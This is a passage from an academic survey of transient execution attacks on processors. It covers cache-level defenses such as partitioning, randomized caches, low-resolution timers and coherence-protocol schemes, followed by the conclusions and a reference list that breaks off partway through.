TechniqueHW/SWMethodProtected ComponentsDrawbacksMax. Performance PenaltyBC SWBC HW
Cache Partitioning [32, 33, 50, 78, 88, 164, 185]HW/SWCache is partitioned between multiple running processesCache LevelPerformance penalty due to resource fighting5% [32]YN
Randomized Caches[41, 89, 121, 122, 125, 131, 137, 147, 169, 184]HWEach process uses a different hash function to access the cacheCache LevelIncrease in access latency due to hash functions13% [184]YN
Low Resolution Timers [103, 144, 152]HW/SWTimers with high resolution are not availableMicro-Architectural State-N/AYY
Coherence Protocol [172]HWCoherence Protocol will mask speculative accesses to the cache hierarchyCache HierarchyComplexity of the coherence scheme and the network increases8.3% [172]YN
Table 4. State-of-the-Art Defenses Which Break the Communication Channel
BC = Backward Compatible.
Cache Partitioning. Cache levels, across the hierarchy, are split among all running processes in the system. The size of each partition can be statically defined [6, 32, 35, 53, 88], a certain number of sets, ways, or both are always reserved for a certain process, or dynamically defined [33, 50, 164, 185], depending on certain heuristics. Regardless of using dynamic or static partitions, there is always a limit to the number of partitions a cache can hold. Partitioning uses unique process identifiers to gate access to a partition state. No process other than the owner can change the state of a partition, namely its size or content. Statically partitioned caches are immune to the construction of communication channels because no other process other than the owner of the partition can manipulate its state. However, due to the strictness of the partition state guarantees, these designs lose performance when more demanding processes are given smaller partitions than less demanding processes. Dynamically defined partitions circumvent the performance issues but may be vulnerable to a new kind of communication channel. An attacker can deploy multiple processes which will attempt to reduce the partition of the victim and occupy all but one partition in the cache. When the victim requires a larger partition, the controller will have to reduce an attacker-controlled partition. The attacker can inspect all partitions and infer some data transmission from how a partition was reduced. It is important to note that, once again, if the attacker does not use a communication-channel in the cache hierarchy then defenses provided by Cache Partitioning are ineffective.
Randomized Caches. In contrast to partitioned caches, instead of splitting the cache and controlling performance, randomized caches leverage the observation that all communication channels can be reduced to eviction-based channels. Replacement-Policy-Based channels, similarly to eviction-based channels, requires finding multiple addresses that occupy the same set. Coherence-Based channels require shared memory to not be deduplicated in the cache hierarchy. Therefore, replacement-policy-based channels can be considered a subset of eviction-based channels while coherence-based channels can be reduced to eviction-based channels by duplicating memory in the cache hierarchy. The latter reduction has a side-effect wherein cacheable shared memory cannot be writable as that would require stores to shared memory to modify multiple cache lines in the hierarchy. By reducing all communication channels to the same type, randomized caches look to make the problem of “finding a group of addresses which occupy the same set” hard. This is achieved by using different hash functions per way. The traditional set-associative cache is split into w direct-mapped caches (\(\text{ways} = 1\)), wherein each direct-mapped cache will use a different hash function. The set is the group of all cache lines returned from each direct-mapped cache. There are proposals which use cryptographic hashes [131, 137, 169], while others will change the hash dynamically [121, 122] or use a single-layer of pointer redirection [89]. Other works, do not rely on these techniques and seek to define security by intrinsically tying multiple states and allowing displacements within the cache [41]. Similarly to cache partitioning, if the attacker does not use a communication-channel in the cache hierarchy then defenses provided by Randomized Caches are ineffective.
Low Resolution Timers. The communication channels described in Section 4 rely on measuring the latency of memory operations to infer what data was transmitted. A possible defense is to decrease the granularity of the timer read by the attacker, such that no difference can be detected between an access serviced by the cache hierarchy and the external memory, or between two different events in the cache hierarchy. Certain execution environments, e.g., browsers, forbid software from accessing the high-performance counters and the timers available in the systems [103, 144, 149, 152]. However, it has been shown that high-resolution timers can be built using other methods [104, 136, 170, 173, 186]. Generally, these timers are constructed by executing a constant-time code and inferring a timer from that executing time. Another option is to amplify the latency of transient instructions, e.g., rely on multiple high-latency micro-architectural events such that the low-resolution timer cannot hide the sequence of events being measured.
Coherence Protocol. The cache hierarchy is manipulated by memory accesses performed by all cores in the system, regardless of speculation or not. The coherence protocol is tasked with maintaining a shared global state between all caches in a system. Any memory access creates coherence traffic in the network. Therefore, even if the cache hierarchy could be efficiently cleared on a mis-speculation, the attacker could still build a communication channel through the latency of the coherence network. Instead of defending particular cache levels, coherence protocol defenses aims to defend the whole cache hierarchy by controlling which cache lines are available in the hierarchy. Similarly to the trap speculation technique in Section 6.1, the coherence protocol reverses the effects of speculation when a misprediction occurs [172].
Discussion. A significant advantage of using limited-communication-channel defenses is that the performance penalty should be lower while the core remains unchanged. The cited works herein show a maximum performance penalty of 13% [184] for limited-communication-channel defenses whereas the limited-speculation defenses show a 125% [167] maximum performance penalty. Focusing on communication channels defenses has three advantages: the ISA does not need to define the global micro-architectural/speculative state; only a small portion of the micro-architectural states lead to a communication channel; and blocking data transfers in the communication channel can be designed and employed independently of the micro-architectural state, which connects to the communication channel. If any TEA requires a communication channel, then a limited-communication-channel defense provides a clear separation of complexities between the speculative state and security. Since limited-communication-channel defenses focus on the cache hierarchy, which has no defined architectural state, most defenses should maintain SW BC. The same is not true for limited-speculation defenses. However, HW BC is not maintained due to the required changes to the cache hierarchy. No member of the industry has yet deployed any defense of this type. One may think that Intel’s Cache Allocation Technology (CAT) could be considered a currently employed defense. However, CAT is insecure because it still allows page sharing between victim and attacker which permits setting up FLUSH+RELOAD [179] or FLUSH+FLUSH [46] communication channels [79]. The reluctance of deploying limited-communication-channel defenses may come from the complexity of the cache hierarchy and that other communication channels may be used [18, 28, 116, 124].
Summary. If the goal of providing performance year-on-year is maintained, the only current solution that is closest to that goal is to use communication-channel-limited defenses. There is significant interest by the community in designing secure caches not only to be used to deter TEAs but also to improve the security of trusted execution environments [29]. Communication channels need to keep being cataloged. This process involves understanding how the communication channel is built, how data is transferred, and how the channel construction and/or transfer can be blocked.

7 Conclusions

TEAs introduce a paradigm shift in computer architectures. No longer are architectures designed with performance and power solely in mind but also with security. Many techniques and components which would provide better performance are susceptible to TEAs. The current toolchains, development flow, and techniques used to implement and design micro-architectures need to be updated to take into account these new threats. Moreover, new metrics related with security need to be defined. Current computer architectures are optimized for performance/watt. However, TEAs demonstrate that new metrics, which relate security to performance, are required. Furthermore, there are unexplored TEAs in hint instructions and within the memory consistency model.
This survey gives an overview of the components involved in the design of micro-architectures which are susceptible to TEAs. This attack type involves implicitly programming a state that is not defined in the ISA. Transient execution is the glue that permits these attacks to occur, which leads to security flaws. We hope that the detailed explanation of the original Meltdown-US and Spectre-PHT/BTB attacks, as well as of recent advances in attacks and defenses against TEAs, inspires and contribute to the design of more secure processors and systems.

Acknowledgments

The authors would also like to thank Paulo Martins, Diogo Marques, and João Vieira for providing suggestions to improve this survey.

References

[1]
Onur Acıiçmez and Werner Schindler. 2008. A vulnerability in RSA implementations due to instruction cache analysis and its demonstration on OpenSSL. In Topics in Cryptology—CT-RSA 2008, Tal Malkin (Ed.), Springer, Berlin, 256–273.
[2]
Anant Agarwal, Richard Simoni, John Hennessy, and Mark Horowitz. 1988. An evaluation of directory schemes for cache coherence. ACM SIGARCH Computer Architecture News 16, 2 (1988), 280–298.
[3]
Sam Ainsworth and Timothy M. Jones. 2020. MuonTrap: Preventing cross-domain spectre-like attacks by capturing speculative state. In Proceedings of the ACM/IEEE 47th Annual International Symposium on Computer Architecture (ISCA’20). IEEE Press, New York, NY, 132–144. DOI:
[4]
AMD. 2007. AMD Opteron Processor Product Data Sheet. Retrieved from https://www.amd.com/system/files/TechDocs/23932.pdf.
[6]
AMD. 2018. AMD64 Technology Platform Quality of Service Extensions. (2018). Retrieved from https://developer.amd.com/wp-content/resources/56375_1.00.pdf.
[7]
AMD. 2018. AMD64 Technology Speculative Store Bypass Disable. (2018). Retrieved from https://developer.amd.com/wp-content/resources/124441_AMD64_SpeculativeStoreBypassDisable_Whitepaper_final.pdf.
[8]
AMD. 2019. Speculation Behavior in AMD Micro-Architectures. (2019). Retrieved from https://www.amd.com/system/files/documents/security-whitepaper.pdf.
[9]
AMD. 2020. Software Techniques for Managing Speculation on AMD Processors. (2020). Retrieved from https://developer.amd.com/wp-content/resources/90343-D_SoftwareTechniquesforManagingSpeculation_WP_9-20Update_R2.pdf.
[10]
AMD. 2021. AMD64 Architecture Programmer’s Manual Volume 2: System Programming. AMD. Retrieved from https://www.amd.com/system/files/TechDocs/24593.pdf.
[12]
ARM. 2022. Arm Architecture Reference Manual for A-profile architecture. ARM. Retrieved from https://developer.arm.com/documentation/ddi0487/latest.
[14]
J-L Baer and W-H Wang. 1988. On the inclusion properties for multi-level cache hierarchies. ACM SIGARCH Computer Architecture News 16, 2 (1988), 73–80.
[15]
Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida. 2022. Branch history injection: On the effectiveness of hardware mitigations against cross-privilege spectre-v2 attacks. In 31st USENIX Security Symposium (USENIX Security 22). USENIX Association, Santa Clara, CA. Retrieved from http://download.vusec.net/papers/bhi-spectre-bhb_sec22.pdf. Intel Bounty Reward.
[16]
Mohammad Behnia, Prateek Sahu, Riccardo Paccagnella, Jiyong Yu, Zirui Neil Zhao, Xiang Zou, Thomas Unterluggauer, Josep Torrellas, Carlos Rozas, Adam Morrison, Frank Mckeen, Fangfei Liu, Ron Gabor, Christopher W. Fletcher, Abhishek Basak, and Alaa Alameldeen. 2021. Speculative interference attacks: Breaking invisible speculation schemes. In Proceedings of the 26th ACM International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS 2021). Association for Computing Machinery, New York, NY, 1046–1060. DOI:
[17]
Daniel J. Bernstein. 2005. Cache-timing Attacks on AES. University of Illinois, Chicago.
[18]
Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessandro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTherSpectre: Exploiting speculative execution through port contention. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (CCS’19). Association for Computing Machinery, New York, NY, 785–800. DOI:
[19]
Tyler Bletsch, Xuxian Jiang, Vince W Freeh, and Zhenkai Liang. 2011. Jump-oriented programming: A new class of code-reuse attack. In Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security. 30–40.
[20]
Samira Briongos, Pedro Malagon, Jose M. Moya, and Thomas Eisenbarth. 2020. RELOAD+REFRESH: Abusing cache replacement policies to perform stealthy cache attacks. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 1967–1984. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/briongos. https://www.usenix.org/system/files/sec20-briongos_0.pdf.
[21]
Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A systematic evaluation of transient execution attacks and defenses. In 28th USENIX Security Symposium (USENIX Security 19). USENIX Association, 249–266. Retrieved from https://www.usenix.org/conference/usenixsecurity19/presentation/canella.
[22]
Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Marina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking data on meltdown-resistant CPUs. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (CCS’19). Association for Computing Machinery, New York, NY, 769–784. DOI:
[23]
Claudio Canella, Sai Manoj Pudukotai Dinakarrao, Daniel Gruss, and Khaled N. Khasawneh. 2020. Evolution of defenses against transient-execution attacks. In Proceedings of the 2020 on Great Lakes Symposium on VLSI (GLSVLSI’20). Association for Computing Machinery, New York, NY, 169–174. DOI:
[24]
Sunjay Cauligi, Craig Disselkoen, Daniel Moghimi, Gilles Barthe, and Deian Stefan. 2021. SoK: Practical foundations for spectre defenses. IEEE Symposium on Security and Privacy (SP’22), IEEE, 666–680.
[25]
Baozi Chen, Qingbo Wu, Yusong Tan, Liu Yang, and Peng Zou. 2018. Exploration for software mitigation to spectre attacks of poisoning indirect branches. IETE Technical Review 35, sup1 (2018), 119–127.
[26]
Caisen Chen, Tao Wang, Yingzhan Kou, Xiaocen Chen, and Xiong Li. 2013. Improvement of trace-driven I-Cache timing attack on the RSA algorithm. Journal of Systems and Software 86, 1 (Jan.2013), 100–107. DOI:
[27]
George Z. Chrysos and Joel S. Emer. 1998. Memory dependence prediction using store sets. In Proceedings of the 25th Annual International Symposium on Computer Architecture (ISCA’98). IEEE Computer Society, 142–153. DOI:
[28]
Jack Cook, Jules Drean, Jonathan Behrens, and Mengjia Yan. 2022. There’s always a bigger fish: A clarifying analysis of a machine-learning-assisted side-channel attack. In Proceedings of the 49th Annual International Symposium on Computer Architecture. 204–217.
[29]
Victor Costan and Srinivas Devadas. 2016. Intel SGX Explained. Cryptology ePrint Archive, Report 2016/086. (2016). Retrieved from https://ia.cr/2016/086.
[30]
Adrian Cristal, Daniel Ortega, Josep Llosa, and Mateo Valero. 2004. Out-of-order commit processors. In Proceedings of the 10th International Symposium on High Performance Computer Architecture (HPCA’04). IEEE, IEEE Press, 48–59.
[31]
Yujie Cui and Xu Cheng. 2022. Abusing cache line dirty states to leak information in commercial processors. In Proceedings of the 2022 IEEE International Symposium on High Performance Computer Architecture (HPCA). IEEE Press.
[32]
Ghada Dessouky, Tommaso Frassetto, and Ahmad-Reza Sadeghi. 2020. HybCache: Hybrid side-channel-resilient caches for trusted execution environments. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 451–468. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/dessouky.
[33]
Ghada Dessouky, Alexander Gruler, Pouya Mahmoody, Ahmad-Reza Sadeghi, and Emmanuel Stapf. 2022. Chunked-cache: On-demand and scalable cache isolation for security architectures. In Proceedings of the Network and Distributed System Security Symposium (NDSS) 2022. The Internet Society. Retrieved from https://arxiv.org/abs/2110.08139.
[34]
Craig Disselkoen, David Kohlbrenner, Leo Porter, and Dean Tullsen. 2017. Prime+Abort: A timer-free high-precision L3 cache attack using intel TSX. In Proceedings of the 26th USENIX Security Symposium (USENIX Security 17). USENIX Association, 51–67. Retrieved from https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/disselkoen.
[35]
Leonid Domnitser, Aamer Jaleel, Jason Loew, Nael Abu-Ghazaleh, and Dmitry Ponomarev. 2012. Non-monopolizable caches: Low-complexity mitigation of cache side channel attacks. ACM Transactions on Architecture and Code Optimization 8, 4, Article 35 (Jan.2012), 21 pages. DOI:
[36]
Jack Doweck. 2006. Inside Intel®core microarchitecture. In Proceedings of the 2006 IEEE Hot Chips 18 Symposium (HCS). IEEE Press, New York, NY, 1–35. DOI:
[37]
A.N. Eden and T. Mudge. 1998. The YAGS branch prediction scheme. In Proceedings of the 31st Annual ACM/IEEE International Symposium on Microarchitecture. IEEE Computer Society, 69–77. DOI:
[38]
Noel Eisley, Li-Shiuan Peh, and Li Shang. 2006. In-network cache coherence. In Proceedings of the 2006 39th Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’06). IEEE, IEEE Press, New York, NY, 321–332.
[39]
Mark Evers, Leslie Barnes, and Mike Clark. 2021. Next generation “Zen 3” core. In Proceedings of the 2021 IEEE Hot Chips 33 Symposium (HCS). IEEE Press, New York, NY, 1–32. DOI:
[40]
Mohammad Rahmani Fadiheh, Alex Wezel, Johannes Müller, Jörg Bormann, Sayak Ray, Jason M. Fung, Subhasish Mitra, Dominik Stoffel, and Wolfgang Kunz. 2022. An exhaustive approach to detecting transient execution side channels in RTL designs of processors. IEEE Transactions on Computers 72, 1 (2022), 222–235.
[41]
Luís Fiolhais, Manuel Goulão, and Leonel Sousa. 2023. CoDi$: Randomized caches through confusion and diffusion. IEEE Access 11 (2023), 17265–17282. https://ieeexplore.ieee.org/document/10047886.
[42]
Kourosh Gharachorloo, Anoop Gupta, and John L. Hennessy. 1991. Two Techniques to Enhance the Performance of Memory Consistency Models. Computer Systems Laboratory, Stanford University.
[43]
Brian Grayson, Jeff Rupley, Gerald Zuraski Zuraski, Eric Quinnell, Daniel A. Jiménez, Tarun Nakra, Paul Kitchin, Ryan Hensley, Edward Brekelbaum, Vikas Sinha, and Ankit Ghiya. 2020. Evolution of the samsung exynos cpu microarchitecture. In Proceedings of the 2020 ACM/IEEE 47th Annual International Symposium on Computer Architecture (ISCA). IEEE, 40–51.
[44]
Marc Green, Leandro Rodrigues-Lima, Andreas Zankl, Gorka Irazoqui, Johann Heyszl, and Thomas Eisenbarth. 2017. AutoLock: Why cache attacks on ARM are harder than you think. In Proceedings of the 26th USENIX Security Symposium (USENIX Security 17). USENIX Association, 1075–1091. Retrieved from https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/green.
[45]
Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Mangard. 2016. Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS’16). Association for Computing Machinery, New York, NY, 368–379. DOI:
[46]
Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. Flush+Flush: A fast and stealthy cache attack. In Detection of Intrusions and Malware, and Vulnerability Assessment. Juan Caballero, Urko Zurutuza, and Ricardo J. Rodríguez (Eds.), Springer International Publishing, Cham, 279–299. Retrieved from https://gruss.cc/files/flushflush.pdf.
[47]
Marco Guarnieri, Boris Köpf, Jan Reineke, and Pepe Vila. 2021. Hardware-software contracts for secure speculation. In Proceedings of the 2021 IEEE Symposium on Security and Privacy (SP). 1868–1883. DOI:
[48]
David Gullasch, Endre Bangerter, and Stephan Krenn. 2011. Cache games–bringing access-based cache attacks on AES to practice. In Proceedings of the 2011 IEEE Symposium on Security and Privacy. IEEE, 490–505.
[49]
Rentong Guo, Xiaofei Liao, Hai Jin, Jianhui Yue, and Guang Tan. 2015. NightWatch: Integrating lightweight and transparent cache pollution control into dynamic memory allocation systems. In Proceedings of the 2015 USENIX Annual Technical Conference (USENIX ATC 15). USENIX Association, 307–318. Retrieved from https://www.usenix.org/conference/atc15/technical-session/presentation/guo. https://www.usenix.org/system/files/conference/atc15/atc15-paper-guo.pdf.
[50]
Moinuddin Qureshi, Gururaj Saileshwar, and Sanjay Kariyappa. 2021. Seeds of SEED: Bespoke cache enclaves: Fine-grained and scalable isolation from cache side-channels via flexible set-partitioning. In Proceedings of the IEEE International Symposium on Secure and Private Execution Environment Design (SEED). IEEE, New York, NY.
[51]
Eric Hao, Po-Yung Chang, and Yale N. Patt. 1994. The effect of speculatively updating branch history on branch prediction accuracy, revisited. In Proceedings of the 27th Annual International Symposium on Microarchitecture. 228–232.
[52]
J. L. Hennessy, D. A. Patterson, and K. Asanović. 2012. Computer Architecture: A Quantitative Approach. Elsevier Science. Retrieved from 2011038128https://books.google.pt/books?id=v3-1hVwHnHwC.
[53]
Andrew Herdrich, Edwin Verplanke, Priya Autee, Ramesh Illikkal, Chris Gianos, Ronak Singhal, and Ravi Iyer. 2016. Cache QoS: From concept to reality in the Intel®Xeon®processor E5-2600 v3 product family. In Proceedings of the 2016 IEEE International Symposium on High Performance Computer Architecture (HPCA). 657–668. DOI:
[54]
Jann Horn. 2018. Issue 1528: speculative execution, variant 4: speculative store bypass. (2018). Retrieved from https://bugs.chromium.org/p/project-zero/issues/detail?id=1528.
[55]
Taylor Hornby. 2016. Side-channel attacks on everyday applications: Distinguishing inputs with flush+ reload. (2016). Retrieved from https://www.blackhat.com/docs/us-16/materials/us-16-Hornby-Side-Channel-Attacks-On-Everyday-Applications-wp.pdf.
[56]
Jaewon Hur, Suhwan Song, Sunwoo Kim, and Byoungyoung Lee. 2022. SpecDoctor: Differential fuzz testing to find transient execution vulnerabilities. In Proceedings of the 2022 ACM SIGSAC Conference on Computer and Communications Security. 1473–1487.
[57]
Jaewon Hur, Suhwan Song, Dongup Kwon, Eunjin Baek, Jangwoo Kim, and Byoungyoung Lee. 2021. DifuzzRTL: Differential fuzz testing to find CPU bugs. In Proceedings of the 2021 IEEE Symposium on Security and Privacy (SP). 1286–1303. DOI:
[58]
Intel. Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 1: Basic Architecture. Retrieved from https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-1-manual.pdf.
[65]
Intel. 2020. Intel®64 and IA-32 Architectures Software Developer’s Manual. Retrieved from https://cdrdv2.intel.com/v1/dl/getContent/671200.
[68]
G. Irazoqui, T. Eisenbarth, and B. Sunar. 2015. S$A: A shared cache attack that works across cores and defies VM sandboxing – and its application to AES. In Proceedings of the 2015 IEEE Symposium on Security and Privacy. 591–604. Retrieved from https://www.ieee-security.org/TC/SP2015/papers-archived/6949a591.pdf.
[69]
Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache attacks. In Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security (ASIA CCS’16). Association for Computing Machinery, New York, NY, 353–364. DOI:
[70]
Saad Islam, Ahmad Moghimi, Ida Bruhns, Moritz Krebbel, Berk Gulmezoglu, Thomas Eisenbarth, and Berk Sunar. 2019. SPOILER: Speculative load hazards boost rowhammer and cache attacks. In Proceedings of the 28th USENIX Security Symposium (USENIX Security 19). USENIX Association, 621–637. Retrieved from https://www.usenix.org/conference/usenixsecurity19/presentation/islam.
[71]
Aamer Jaleel, Eric Borch, Malini Bhandaru, Simon C. Steely Jr, and Joel Emer. 2010. Achieving non-inclusive cache performance with inclusive caches: Temporal locality aware (TLA) cache management policies. In Proceedings of the 2010 43rd Annual IEEE/ACM International Symposium on Microarchitecture. IEEE, 151–162.
[72]
Daniel A Jiménez and Calvin Lin. 2001. Dynamic branch prediction with perceptrons. In Proceedings of the HPCA 7th International Symposium on High-Performance Computer Architecture. IEEE, 197–206.
[73]
Daniel A. Jiménez and Calvin Lin. 2002. Neural methods for dynamic branch prediction. ACM Transactions on Computer Systems (TOCS) 20, 4 (2002), 369–397.
[74]
Brian Johannesmeyer, Jakob Koschel, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2022. Kasper: Scanning for generalized transient execution gadgets in the linux kernel. In Proceedings of the NDSS Symposium 2022.
[75]
Norman P. Jouppi. 1993. Cache write policies and performance. ACM SIGARCH Computer Architecture News 21, 2 (1993), 191–201.
[76]
Richard E. Kessler, Edward J. McLellan, and David A. Webb. 1998. The alpha 21264 microprocessor architecture. In Proceedings of the International Conference on Computer Design. VLSI in Computers and Processors (Cat. No. 98CB36273). IEEE, 90–95.
[77]
Khaled N. Khasawneh, Esmaeil Mohammadian Koruyeh, Chengyu Song, Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2019. SafeSpec: Banishing the spectre of a meltdown with leakage-free speculation. In Proceedings of the 56th Annual Design Automation Conference 2019 (DAC’19). Association for Computing Machinery, New York, NY, Article 60, 6 pages. DOI:
[78]
Vladimir Kiriansky, Ilia Lebedev, Saman Amarasinghe, Srinivas Devadas, and Joel Emer. 2018. DAWG: A defense against cache timing attacks in speculative execution processors. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). IEEE, 974–987.
[79]
V. Kiriansky, I. Lebedev, S. Amarasinghe, S. Devadas, and J. Emer. 2018. DAWG: A defense against cache timing attacks in speculative execution processors. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). 974–987. Retrieved from https://eprint.iacr.org/2018/418.pdf.
[80]
Vladimir Kiriansky and Carl A. Waldspurger. 2018. Speculative buffer overflows: Attacks and defenses. arXiv:1807.03757. Retrieved from https://arxiv.org/abs/1807.03757.
[81]
Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, and Yuval Yarom. 2019. Spectre attacks: Exploiting speculative execution. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P’19). Retrieved from https://spectreattack.com/spectre.pdf.
[82]
Francois Koeune, Jean-Jacques Quisquater, and Jean-Jacques Quisquater. 1999. A Timing Attack Against Rijndael. Université catholique de Louvain.
[83]
Esmaeil Mohammadian Koruyeh, Khaled N. Khasawneh, Chengyu Song, and Nael Abu-Ghazaleh. 2018. Spectre returns! speculation attacks using the return stack buffer. In Proceedings of the 12th USENIX Workshop on Offensive Technologies (WOOT 18). USENIX Association. Retrieved from https://www.usenix.org/conference/woot18/presentation/koruyeh.
[84]
David Kroft. 1998. Lockup-free instruction fetch/prefetch cache organization. In Proceedings of the 25 years of the International Symposia on Computer Architecture (Selected Papers). 195–201.
[85]
Leslie Lamport. 1979. How to make a multiprocessor computer that correctly executes multiprocess programs. IEEE Transactions on Computers c-28 9 (1979), 690–691.
[86]
Mengming Li, Chenlu Miao, Yilong Yang, and Kai Bu. 2022. unXpec: Breaking undo-based safe speculation. In Proceedings of the 2022 IEEE International Symposium on High Performance Computer Architecture (HPCA). IEEE Press, New York, NY.
[87]
Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, and Mike Hamburg. 2018. Meltdown: Reading kernel memory from user space. In Proceedings of the 27th USENIX Security Symposium (USENIX Security 18). Retrieved from https://meltdownattack.com/meltdown.pdf.
[88]
F. Liu, Q. Ge, Y. Yarom, F. Mckeen, C. Rozas, G. Heiser, and R. B. Lee. 2016. CATalyst: Defeating last-level cache side channel attacks in cloud computing. In Proceedings of the 2016 IEEE International Symposium on High Performance Computer Architecture (HPCA). 406–418. Retrieved from http://palms.ee.princeton.edu/system/files/CATalyst_vfinal_correct.pdf.
[89]
F. Liu, H. Wu, K. Mai, and R. B. Lee. 2016. Newcache: Secure cache architecture thwarting cache side-channel attacks. IEEE Micro 36, 5 (2016), 8–16. Retrieved from http://palms.ee.princeton.edu/system/files/07723806.pdf.
[90]
F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee. 2015. Last-level cache side-channel attacks are practical. In Proceedings of the 2015 IEEE Symposium on Security and Privacy. 605–622. Retrieved from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf.
[91]
Xiaoxuan Lou, Tianwei Zhang, Jun Jiang, and Yinqian Zhang. 2021. A survey of microarchitectural side-channel vulnerabilities, attacks, and defenses in cryptography. ACM Computing Surveys 54, 6, Article 122 (Jul2021), 37 pages. DOI:
[92]
Kevin Loughlin, Ian Neal, Jiacheng Ma, Elisa Tsai, Ofir Weisse, Satish Narayanasamy, and Baris Kasikci. 2021. DOLMA: Securing speculation with the principle of transient non-observability. In Proceedings of the USENIX Security Symposium. 1397–1414.
[93]
Giorgi Maisuradze and Christian Rossow. 2018. Ret2spec: Speculative execution using return stack buffers. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security (CCS’18). Association for Computing Machinery, New York, NY, 2109–2122. DOI:
[94]
Luc Maranget, Susmit Sarkar, and Peter Sewell. 2012. A tutorial introduction to the ARM and POWER relaxed memory models. Draft available fromhttp://www.cl.cam.ac.uk/pes20/ppc-supplemental/test7.pdf (2012).
[95]
Milo MK Martin, Mark D Hill, and David A Wood. 2003. Token coherence: Decoupling performance and correctness. ACM SIGARCH Computer Architecture News 31, 2 (2003), 182–193.
[96]
Scott McFarling. 1993. Combining Branch Predictors. Technical Report. Citeseer.
[97]
Alyssa Milburn, Ke Sun, and Henrique Kawakami. 2022. You cannot always win the race: Analyzing the LFENCE/JMP mitigation for branch target injection. arXiv:2203.04277. Retrieved from https://arxiv.org/abs/2203.04277.
[98]
Daniel Moghimi, Moritz Lipp, Berk Sunar, and Michael Schwarz. 2020. Medusa: Microarchitectural data leakage via automated attack synthesis. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 1427–1444. Retrieved fromhttps://www.usenix.org/conference/usenixsecurity20/presentation/moghimi-medusa.
[99]
Andreas Moshovos, Scott E. Breach, Terani N. Vijaykumar, and Gurindar S. Sohi. 1997. Dynamic speculation and synchronization of data dependences. In Proceedings of the 24th Annual International Symposium on Computer Architecture. 181–193.
[100]
Andreas Moshovos, Scott E. Breach, T. N. Vijaykumar, and Gurindar S. Sohi. 1997. Dynamic speculation and synchronization of data dependences. SIGARCH Computer Architecture News 25, 2 (May1997), 181–193. DOI:
[101]
A. Moshovos and G.S. Sohi. 1997. Streamlining inter-operation memory communication via data dependence prediction. In Proceedings of the 30th Annual International Symposium on Microarchitecture. IEEE Computer Society, 235–245. DOI:
[102]
Nicholas Mosier, Hanna Lachnitt, Hamed Nemati, and Caroline Trippel. 2021. Relational models of microarchitectures for formal security analyses. arXiv:2112.10511. Retrieved from https://arxiv.org/abs/2112.10511.
[103]
Mozilla. 2018. Mitigations landing for new class of timing attack. Retrieved from https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/.
[105]
Sujit Kumar Muduli, Gourav Takhar, and Pramod Subramanyan. 2020. HyperFuzzing for SoC security validation. In Proceedings of the 2020 IEEE/ACM International Conference On Computer Aided Design (ICCAD). 1–9.
[106]
Vijay Nagarajan, Daniel J. Sorin, Mark D. Hill, and David A. Wood. 2020. A primer on memory consistency and cache coherence, second edition. Synthesis Lectures on Computer Architecture 15, 1 (2020), 1–294. DOI:
[107]
Michael Neve and Jean-Pierre Seifert. 2007. Advances on access-driven cache attacks on AES. In Selected Areas in Cryptography. Eli Biham and Amr M. Youssef (Eds.), Springer, Berlin, 147–162.
[108]
Oleksii Oleksenko, Bohdan Trach, Mark Silberstein, and Christof Fetzer. 2020. SpecFuzz: Bringing spectre-type vulnerabilities to the surface. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 1481–1498. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/oleksenko.
[109]
Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache attacks and countermeasures: The case of AES. In Topics in Cryptology—CT-RSA 2006. David Pointcheval (Ed.), Springer, Berlin, 1–20. Retrieved from https://www.cs.tau.ac.il/tromer/papers/cache.pdf.
[110]
